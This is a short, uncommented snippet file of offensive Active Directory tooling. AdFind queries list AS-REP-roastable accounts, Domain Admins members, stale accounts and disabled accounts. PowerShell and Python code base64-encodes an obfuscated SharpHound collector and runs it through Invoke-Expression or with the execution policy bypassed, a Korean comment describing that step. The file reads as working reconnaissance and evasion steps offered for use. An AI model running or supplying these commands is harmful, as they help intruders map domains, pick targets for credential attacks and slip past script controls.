adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" sAMAccountName
adfind -f "(&(objectcategory=user)(lastLogonTimestamp<=132000000000000000))" sAMAccountName lastLogonTimestamp
adfind -f "memberof=CN=Domain Admins,CN=Users,DC=domain,DC=com" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=64))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" sAMAccountName

$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content .\SharpHound_Obfuscated.ps1 -Raw)))
$encoded | Out-File .\enc.txt

$content = Get-Content .\enc.txt -Raw
$decoded = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($content))
Invoke-Expression $decoded



import base64

with open("SharpHound_Obfuscated.ps1", "rb") as f:
    encoded = base64.b64encode(f.read())

with open("encoded.txt", "wb") as out:
    out.write(encoded)

    
import subprocess
import base64

# base64로 인코딩된 난독화된 PowerShell 코드 로드
with open("SharpHound_Obfuscated_Base64.txt", "rb") as f:
    b64code = f.read()

# base64 디코딩
ps_script = base64.b64decode(b64code).decode("utf-8")

# powershell 실행 - NoProfile, Bypass, stdin으로 스크립트 전달
proc = subprocess.run(
    ["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", "-"],
    input=ps_script,
    text=True,
    capture_output=True
)

print(proc.stdout)
print(proc.stderr)
